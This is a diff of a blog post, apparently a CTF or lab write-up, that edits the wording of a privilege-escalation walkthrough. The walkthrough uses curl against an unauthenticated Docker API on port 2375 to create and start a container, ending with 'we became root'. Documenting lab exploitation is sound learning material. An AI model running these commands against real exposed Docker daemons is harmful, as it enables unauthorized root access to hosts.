innocentx0/innocentx0.github.io/_posts/2025-12-14-php-docker-more.md

 ```shell
 curl -H "Content-Type: application/json" -d @cr.json http://192.168.65.7:2375/containers/create -o resp.json
 ```
-> In the resp.json, and ID is showed, we must is it to start the container with that image
+> In the resp.json, there is the container Id, we must use it to start the container with that image

-id=cdbe8635fa8c923e3452446a63a17c27251d9651b11a69e59de9fc8da8567cf9
+`id=cdbe8635fa8c923e3452446a63a17c27251d9651b11a69e59de9fc8da8567cf9`

 ```bash
 curl -X POST http://192.168.65.7:2375/containers/$id/start
 ```
-And finally we became root!
+And finally we became root! <br>
 <img width="336" height="57" alt="image" src="https://github.com/user-attachments/assets/a3f880e9-eb8e-47b3-ab58-e9439f92825f" />